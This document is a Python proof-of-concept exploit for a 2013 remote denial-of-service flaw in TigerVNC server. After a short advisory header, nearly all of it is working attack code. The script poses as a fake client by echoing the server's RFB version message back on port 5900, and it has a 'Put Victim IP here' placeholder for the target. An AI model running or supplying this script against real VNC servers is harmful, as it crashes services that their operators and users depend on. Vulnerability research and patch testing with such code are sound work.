#!/usr/bin/env python
#================================================================#
# [+] Title: TigerVNC Server Remote DoS Vulnerability #
# [+] Discovered: 28/07/2013 #
# [+] Software Vendor: http://sourceforge.net/projects/tigervnc/ #
# [+] Author: Z3r0n3 - Independent Security Researcher #
# [+] Contact: z3r0n3@mail.com #
# [+] Overview: #
# A remote attacker can crash TigerVNC server by creating #
# a fake client. after registring the client, any control #
# the server try to do (View-only, Full control...) on the #
# client can bring the server down (No one play with clients!) #
#================================================================#
import
socket, sys;
def
SrvRecv():
global
srvmsg;
srvmsg
=
client.recv(
1024
);
print
(
"[<-] Srv: "
, srvmsg);
host
=
"localhost"
;
# Put Victim IP here
port
=
5900
;
print
(
"[+] Creating socket..."
);
client
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM);
try
:
print
(
"[+] Trying to connect with TigerVNC server..."
);
client.connect((host,port));
except
socket.error:
print
(
"[!] Can't connect..."
);
client.close()
sys.exit()
print
(
"[x] Connected..."
);
SrvRecv()
client.send(srvmsg)
# srvmsg="RFB XXX.XXX"
print
(
"""[x] Go to TigerVNC server and click on Full control to obtain a full crash"""
)
x
=
input
(
"[x] Don't press anything till the server is down"
);
client.close();